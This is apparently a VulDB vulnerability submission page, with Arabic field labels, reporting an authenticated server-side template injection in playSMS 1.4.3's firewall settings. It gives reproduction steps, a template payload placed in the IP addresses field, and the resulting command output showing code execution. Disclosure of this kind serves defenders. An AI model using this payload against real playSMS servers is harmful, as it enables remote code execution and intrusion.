إرسال #363730: playSMS 1.4.3 Server Side Template Injection (SSTI)المعلومات

عنوان	playSMS 1.4.3 Server Side Template Injection (SSTI)
الوصف	PlaySMS 1.4.3 has authenticated Server Side Template Injection in Manage firewall. The manipulation of the argument IP addresses, that leads to a Authenticated RCE 1. Authenticate in login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login 2. Click in Settings > Manage firewall (/index.php?app=main&inc=feature_firewall&op=firewall_list) 3. Click in Plus (+) icon to add new rule 4. Add payload {{`id`}} in "IP addresses " field and add an user field "Select username" 5. Save and back to Settings > Manage firewall http://172.16.1.195/playsms/index.php?app=main&inc=feature_firewall&op=firewall_list&search_keyword=&search_category=&page=1&nav=1 <tbody> <tr> <td>admin</td> <td>uid=33(www-data) gid=33(www-data) groups=33(www-data) </td> <td> <input type=hidden name=itemid[0] value="7"> <input type=checkbox name=checkid[0]> </td> </tr>
المصدر	⚠️ https://github.com/playsms/playsms/tree/master/storage/application/plugin/feature/firewall
المستخدم	Dhimitri (UID 45045)
ارسال	25/06/2024 01:03 AM (2 سنوات منذ)
الاعتدال	03/07/2024 07:29 AM (8 days later)
الحالة	تمت الموافقة
إدخال VulDB	270277 [playSMS 1.4.3 Template عنوان بروتوكول الإنترنت تجاوز الصلاحيات]
النقاط	20

Interested in the pricing of exploits?

See the underground prices here!